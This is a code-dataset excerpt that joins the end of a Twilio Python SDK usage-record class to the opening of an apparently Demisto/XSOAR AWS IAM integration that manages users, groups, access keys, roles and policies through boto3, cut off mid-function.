WIRELESS_USAGE_DATA_DOMESTIC_ROAMING = "wireless-usage-data-domestic-roaming"
WIRELESS_USAGE_DATA_EUROPE = "wireless-usage-data-europe"
WIRELESS_USAGE_DATA_INDIVIDUAL_ADDITIONALGB = "wireless-usage-data-individual-additionalgb"
WIRELESS_USAGE_DATA_INDIVIDUAL_FIRSTGB = "wireless-usage-data-individual-firstgb"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_CANADA = "wireless-usage-data-international-roaming-canada"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_INDIA = "wireless-usage-data-international-roaming-india"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_MEXICO = "wireless-usage-data-international-roaming-mexico"
WIRELESS_USAGE_DATA_NORTHAMERICA = "wireless-usage-data-northamerica"
WIRELESS_USAGE_DATA_OCEANIA = "wireless-usage-data-oceania"
WIRELESS_USAGE_DATA_POOLED = "wireless-usage-data-pooled"
WIRELESS_USAGE_DATA_POOLED_DOWNLINK = "wireless-usage-data-pooled-downlink"
WIRELESS_USAGE_DATA_POOLED_UPLINK = "wireless-usage-data-pooled-uplink"
WIRELESS_USAGE_MRC = "wireless-usage-mrc"
WIRELESS_USAGE_MRC_CUSTOM = "wireless-usage-mrc-custom"
WIRELESS_USAGE_MRC_INDIVIDUAL = "wireless-usage-mrc-individual"
WIRELESS_USAGE_MRC_POOLED = "wireless-usage-mrc-pooled"
WIRELESS_USAGE_MRC_SUSPENDED = "wireless-usage-mrc-suspended"
WIRELESS_USAGE_VOICE = "wireless-usage-voice"
WIRELESS_USAGE_SMS = "wireless-usage-sms"
def __init__(self, version, payload, account_sid):
"""
Initialize the ThisMonthInstance
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
"""
super(ThisMonthInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload['account_sid'],
'api_version': payload['api_version'],
'as_of': payload['as_of'],
'category': payload['category'],
'count': payload['count'],
'count_unit': payload['count_unit'],
'description': payload['description'],
'end_date': deserialize.iso8601_date(payload['end_date']),
'price': deserialize.decimal(payload['price']),
'price_unit': payload['price_unit'],
'start_date': deserialize.iso8601_date(payload['start_date']),
'subresource_uris': payload['subresource_uris'],
'uri': payload['uri'],
'usage': payload['usage'],
'usage_unit': payload['usage_unit'],
}
# Context
self._context = None
self._solution = {'account_sid': account_sid, }
@property
def account_sid(self):
"""
:returns: The SID of the Account accrued the usage
:rtype: unicode
"""
return self._properties['account_sid']
@property
def api_version(self):
"""
:returns: The API version used to create the resource
:rtype: unicode
"""
return self._properties['api_version']
@property
def as_of(self):
"""
:returns: Usage records up to date as of this timestamp
:rtype: unicode
"""
return self._properties['as_of']
@property
def category(self):
"""
:returns: The category of usage
:rtype: ThisMonthInstance.Category
"""
return self._properties['category']
@property
def count(self):
"""
:returns: The number of usage events
:rtype: unicode
"""
return self._properties['count']
@property
def count_unit(self):
"""
:returns: The units in which count is measured
:rtype: unicode
"""
return self._properties['count_unit']
@property
def description(self):
"""
:returns: A plain-language description of the usage category
:rtype: unicode
"""
return self._properties['description']
@property
def end_date(self):
"""
:returns: The last date for which usage is included in the UsageRecord
:rtype: date
"""
return self._properties['end_date']
@property
def price(self):
"""
:returns: The total price of the usage
:rtype: unicode
"""
return self._properties['price']
@property
def price_unit(self):
"""
:returns: The currency in which `price` is measured
:rtype: unicode
"""
return self._properties['price_unit']
@property
def start_date(self):
"""
:returns: The first date for which usage is included in this UsageRecord
:rtype: date
"""
return self._properties['start_date']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
@property
def uri(self):
"""
:returns: The URI of the resource, relative to `https://api.twilio.com`
:rtype: unicode
"""
return self._properties['uri']
@property
def usage(self):
"""
:returns: The amount of usage
:rtype: unicode
"""
return self._properties['usage']
@property
def usage_unit(self):
"""
:returns: The units in which usage is measured
:rtype: unicode
"""
return self._properties['usage_unit']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthInstance>'
| 46.099349 | 121 | 0.68903 |
e480f22d663f86aaeb895426ef4c752196757569 | 43,199 | py | Python | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | ryantoddtq/content | 50027658da7189e37e9514fc03057d1c1bc3209f | [
"MIT"
] | 2 | 2020-07-27T10:35:41.000Z | 2020-12-14T15:44:18.000Z | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | Axonius/content | e058add82b7422338015cf14591512b9aad4d3e9 | [
"MIT"
] | 48 | 2022-03-08T13:45:00.000Z | 2022-03-31T14:32:05.000Z | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | Axonius/content | e058add82b7422338015cf14591512b9aad4d3e9 | [
"MIT"
] | 1 | 2022-01-06T07:09:11.000Z | 2022-01-06T07:09:11.000Z | import demistomock as demisto
from CommonServerPython import *
from datetime import datetime, date
import boto3
from botocore.config import Config
from botocore.parsers import ResponseParserError
import urllib3.util
# Disable insecure warnings
urllib3.disable_warnings()
# Initiating params object for efficiency
params = demisto.params()
AWS_DEFAULT_REGION = None
AWS_ROLE_ARN = params.get('roleArn')
AWS_ROLE_SESSION_NAME = params.get('roleSessionName')
AWS_ROLE_SESSION_DURATION = params.get('sessionDuration')
AWS_ROLE_POLICY = None
AWS_ACCESS_KEY_ID = params.get('access_key')
AWS_SECRET_ACCESS_KEY = params.get('secret_key')
VERIFY_CERTIFICATE = not params.get('insecure', True)
proxies = handle_proxy(proxy_param_name='proxy', checkbox_default_value=False)
config = Config(
connect_timeout=1,
retries=dict(
max_attempts=5
),
proxies=proxies
)
def aws_session(service='iam', region=None, roleArn=None, roleSessionName=None,
roleSessionDuration=None,
rolePolicy=None):
kwargs = {}
if roleArn and roleSessionName is not None:
kwargs.update({
'RoleArn': roleArn,
'RoleSessionName': roleSessionName,
})
elif AWS_ROLE_ARN and AWS_ROLE_SESSION_NAME is not None:
kwargs.update({
'RoleArn': AWS_ROLE_ARN,
'RoleSessionName': AWS_ROLE_SESSION_NAME,
})
if roleSessionDuration is not None:
kwargs.update({'DurationSeconds': int(roleSessionDuration)})
elif AWS_ROLE_SESSION_DURATION is not None:
kwargs.update({'DurationSeconds': int(AWS_ROLE_SESSION_DURATION)})
if rolePolicy is not None:
kwargs.update({'Policy': rolePolicy})
elif AWS_ROLE_POLICY is not None:
kwargs.update({'Policy': AWS_ROLE_POLICY})
if kwargs and not AWS_ACCESS_KEY_ID:
if not AWS_ACCESS_KEY_ID:
sts_client = boto3.client('sts', config=config, verify=VERIFY_CERTIFICATE,
region_name=AWS_DEFAULT_REGION)
sts_response = sts_client.assume_role(**kwargs)
if region is not None:
client = boto3.client(
service_name=service,
region_name=region,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
else:
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
elif AWS_ACCESS_KEY_ID and AWS_ROLE_ARN:
sts_client = boto3.client(
service_name='sts',
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
kwargs.update({
'RoleArn': AWS_ROLE_ARN,
'RoleSessionName': AWS_ROLE_SESSION_NAME,
})
sts_response = sts_client.assume_role(**kwargs)
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
else:
if region is not None:
client = boto3.client(
service_name=service,
region_name=region,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
else:
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
return client
class DatetimeEncoder(json.JSONEncoder):
# pylint: disable=method-hidden
def default(self, obj):
if isinstance(obj, datetime):
return obj.strftime('%Y-%m-%dT%H:%M:%S')
elif isinstance(obj, date):
return obj.strftime('%Y-%m-%d')
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
def create_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'UserName': args.get('userName')}
if args.get('path'):
kwargs.update({'Path': args.get('path')})
response = client.create_user(**kwargs)
user = response['User']
data = ({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def create_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'UserName': args.get('userName'),
'Password': args.get('password')
}
if args.get('passwordResetRequired'):
kwargs.update({'PasswordResetRequired': True if args.get(
'passwordResetRequired') == 'True' else False})
response = client.create_login_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("Login Profile Was Created For user {0} ".format(args.get('userName')))
def get_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_user(UserName=args.get('userName'))
user = response['User']
data = ({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def list_users(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
paginator = client.get_paginator('list_users')
for response in paginator.paginate():
for user in response['Users']:
data.append({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%d %H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def update_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'UserName': args.get('oldUserName')}
if args.get('newUserName'):
kwargs.update({'NewUserName': args.get('newUserName')})
if args.get('newPath'):
kwargs.update({'NewPath': args.get('newPath')})
response = client.update_user(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Changed UserName {0} To: {1}".format(args.get('oldUserName'), args.get('newUserName')))
def delete_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_user(UserName=args.get('userName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results('The User {0} has been deleted'.format(args.get('userName')))
def update_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.update_login_profile(
Password=args.get('newPassword'),
UserName=args.get('userName'),
PasswordResetRequired=True if args.get('passwordResetRequired') == 'True' else False
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} Password was changed".format(args.get('userName')))
def create_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'GroupName': args.get('groupName')}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
response = client.create_group(**kwargs)
group = response['Group']
data = ({
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Groups': data}
human_readable = tableToMarkdown('AWS IAM Groups', data)
return_outputs(human_readable, ec)
def list_groups(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
paginator = client.get_paginator('list_groups')
for response in paginator.paginate():
for group in response['Groups']:
data.append({
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Groups': data}
human_readable = tableToMarkdown('AWS IAM Groups', data)
return_outputs(human_readable, ec)
def list_groups_for_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_groups_for_user(UserName=args.get('userName'))
for group in response['Groups']:
data.append({
'UserName': args.get('userName'),
'GroupName': group['GroupName'],
'GroupId': group['GroupId'],
'Arn': group['Arn'],
'CreateDate': datetime.strftime(group['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': group['Path'],
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).Groups': data}
human_readable = tableToMarkdown('AWS IAM User Groups', data)
return_outputs(human_readable, ec)
def add_user_to_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.add_user_to_group(
GroupName=args.get('groupName'),
UserName=args.get('userName')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} was added to the IAM group: {1}".format(args.get('userName'),
args.get(
'groupName')))
def create_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.create_access_key(UserName=args.get('userName'))
AccessKey = response['AccessKey']
data = ({
'UserName': AccessKey['UserName'],
'AccessKeyId': AccessKey['AccessKeyId'],
'SecretAccessKey': AccessKey['SecretAccessKey'],
'Status': AccessKey['Status'],
'CreateDate': datetime.strftime(AccessKey['CreateDate'], '%Y-%m-%dT%H:%M:%S')
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).AccessKeys': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def update_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.update_access_key(
UserName=args.get('userName'),
AccessKeyId=args.get('accessKeyId'),
Status=args.get('status')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Access Key with ID {0} was set to status: {1}".format(args.get('accessKeyId'),
args.get('status')))
def list_access_key_for_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_access_keys(UserName=args.get('userName'))
for accesskey in response['AccessKeyMetadata']:
data.append({
'UserName': accesskey['UserName'],
'AccessKeyId': accesskey['AccessKeyId'],
'Status': accesskey['Status'],
'CreateDate': datetime.strftime(accesskey['CreateDate'], '%Y-%m-%dT%H:%M:%S')
})
ec = {'AWS.IAM.Users(val.UserName === obj.UserName).AccessKeys': data}
human_readable = tableToMarkdown('AWS IAM Users Access Keys', data)
return_outputs(human_readable, ec)
def list_policies(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_policies(
Scope=args.get('scope'),
OnlyAttached=True if args.get('onlyAttached') == 'True' else False
)
for policy in response['Policies']:
data.append({
'PolicyName': policy['PolicyName'],
'PolicyId': policy['PolicyId'],
'Arn': policy['Arn'],
'Path': policy['Path'],
'DefaultVersionId': policy['DefaultVersionId'],
'IsAttachable': policy['IsAttachable'],
'AttachmentCount': policy['AttachmentCount'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'UpdateDate': datetime.strftime(policy['UpdateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies': data}
human_readable = tableToMarkdown('AWS IAM Policies', data)
return_outputs(human_readable, ec)
def list_roles(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
output = []
paginator = client.get_paginator('list_roles')
for response in paginator.paginate():
for role in response['Roles']:
data.append({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'CreateDate': datetime.strftime(role['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': role['Path'],
})
output.append(role)
raw = json.loads(json.dumps(output, cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def attach_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
if args.get('type') == 'User':
response = client.attach_user_policy(
UserName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Group':
response = client.attach_group_policy(
GroupName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Role':
response = client.attach_role_policy(
RoleName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Policy was attached to {0}: {1} ".format(args.get('type'), args.get('entityName')))
def detach_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
if args.get('type') == 'User':
response = client.detach_user_policy(
UserName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Group':
response = client.detach_group_policy(
GroupName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if args.get('type') == 'Role':
response = client.detach_role_policy(
RoleName=args.get('entityName'),
PolicyArn=args.get('policyArn')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"Policy was detached from {0}: {1} ".format(args.get('type'), args.get('entityName')))
def delete_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_login_profile(UserName=args.get('userName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The user {0} login profile has been deleted".format(args.get('userName')))
def delete_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_group(GroupName=args.get('groupName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Group {0} has been deleted".format(args.get('groupName')))
def remove_user_from_group(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.remove_user_from_group(
GroupName=args.get('groupName'),
UserName=args.get('userName')
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The User {0} has been removed from the group {1}".format(args.get('userName'),
args.get('groupName')))
def delete_access_key(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'UserName': args.get('userName'),
'AccessKeyId': args.get('AccessKeyId')
}
response = client.delete_access_key(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Access Key was deleted")
def create_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'InstanceProfileName': args.get('instanceProfileName')}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
response = client.create_instance_profile(**kwargs)
instanceProfile = response['InstanceProfile']
data = ({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['Path'],
'Arn': instanceProfile['Arn'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.InstanceProfiles': data}
human_readable = tableToMarkdown('AWS IAM InstanceProfile', data)
return_outputs(human_readable, ec)
def delete_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_instance_profile(InstanceProfileName=args.get('instanceProfileName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The InstanceProfile: {0} was deleted".format(args.get('instanceProfileName')))
def list_instance_profiles(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
output = []
data = []
paginator = client.get_paginator('list_instance_profiles')
for response in paginator.paginate():
for instanceProfile in response['InstanceProfiles']:
data.append({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
output.append(instanceProfile)
raw = json.loads(json.dumps(output, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
def add_role_to_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'InstanceProfileName': args.get('instanceProfileName'),
'RoleName': args.get('roleName')
}
response = client.add_role_to_instance_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The Role: {0} was added to the Instance Profile: {1}".format(args.get('roleName'),
args.get('instanceProfileName'))
)
def remove_role_from_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'InstanceProfileName': args.get('instanceProfileName'),
'RoleName': args.get('roleName')
}
response = client.remove_role_from_instance_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results(
"The Role: {0} was removed from the Instance Profile: {1}".format(args.get('roleName'),
args.get(
'instanceProfileName')))
def list_instance_profiles_for_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
output = []
data = []
paginator = client.get_paginator('list_instance_profiles_for_role')
for response in paginator.paginate(RoleName=args.get('roleName')):
for instanceProfile in response['InstanceProfiles']:
data.append({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Arn': instanceProfile['Arn'],
})
output.append(instanceProfile)
raw = json.loads(json.dumps(instanceProfile, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
def get_instance_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_instance_profile(InstanceProfileName=args.get('instanceProfileName'))
instanceProfile = response['InstanceProfile']
data = ({
'Path': instanceProfile['Path'],
'InstanceProfileName': instanceProfile['InstanceProfileName'],
'InstanceProfileId': instanceProfile['InstanceProfileId'],
'CreateDate': datetime.strftime(instanceProfile['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
raw = json.loads(json.dumps(instanceProfile, cls=DatetimeEncoder))
ec = {'AWS.IAM.InstanceProfiles': raw}
human_readable = tableToMarkdown('AWS IAM Instance Profiles', data)
return_outputs(human_readable, ec)
def get_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_role(RoleName=args.get('roleName'))
role = response['Role']
data = ({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'CreateDate': datetime.strftime(role['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': role['Path'],
})
raw = json.loads(json.dumps(response['Role'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def delete_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_role(RoleName=args.get('roleName'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Role: {0} was deleted".format(args.get('roleName')))
def create_role(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'RoleName': args.get('roleName'),
'AssumeRolePolicyDocument': json.dumps(json.loads(args.get('assumeRolePolicyDocument')))
}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
if args.get('description') is not None:
kwargs.update({'Description': args.get('description')})
if args.get('maxSessionDuration') is not None:
kwargs.update({'MaxSessionDuration': int(args.get('maxSessionDuration'))})
# return kwargs
response = client.create_role(**kwargs)
role = response['Role']
data = ({
'RoleName': role['RoleName'],
'RoleId': role['RoleId'],
'Arn': role['Arn'],
'Path': role['Path'],
})
raw = json.loads(json.dumps(response['Role'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Roles': raw}
human_readable = tableToMarkdown('AWS IAM Roles', data)
return_outputs(human_readable, ec)
def create_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyName': args.get('policyName'),
'PolicyDocument': json.dumps(json.loads(args.get('policyDocument')))
}
if args.get('path') is not None:
kwargs.update({'Path': args.get('path')})
if args.get('description') is not None:
kwargs.update({'Description': args.get('description')})
response = client.create_policy(**kwargs)
policy = response['Policy']
data = ({
'PolicyName': policy['PolicyName'],
'PolicyId': policy['PolicyId'],
'Arn': policy['Arn'],
'Path': policy['Path'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
raw = json.loads(json.dumps(response['Policy'], cls=DatetimeEncoder))
ec = {'AWS.IAM.Policies': raw}
human_readable = tableToMarkdown('AWS IAM Policies', data)
return_outputs(human_readable, ec)
def delete_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.delete_policy(PolicyArn=args.get('policyArn'))
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Policy: {0} was deleted".format(args.get('policyArn')))
def create_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'PolicyDocument': json.dumps(json.loads(args.get('policyDocument')))
}
if args.get('setAsDefault') is not None:
kwargs.update({'SetAsDefault': True if args.get('setAsDefault') == 'True' else False})
response = client.create_policy_version(**kwargs)
policy = response['PolicyVersion']
data = ({
'PolicyArn': args.get('policyArn'),
'VersionId': policy['VersionId'],
'IsDefaultVersion': policy['IsDefaultVersion'],
'CreateDate': datetime.strftime(policy['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('New AWS IAM Policy Version', data)
return_outputs(human_readable, ec)
def delete_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.delete_policy_version(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Policy Version was deleted")
def list_policy_versions(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
response = client.list_policy_versions(PolicyArn=args.get('policyArn'))
for version in response['Versions']:
data.append({
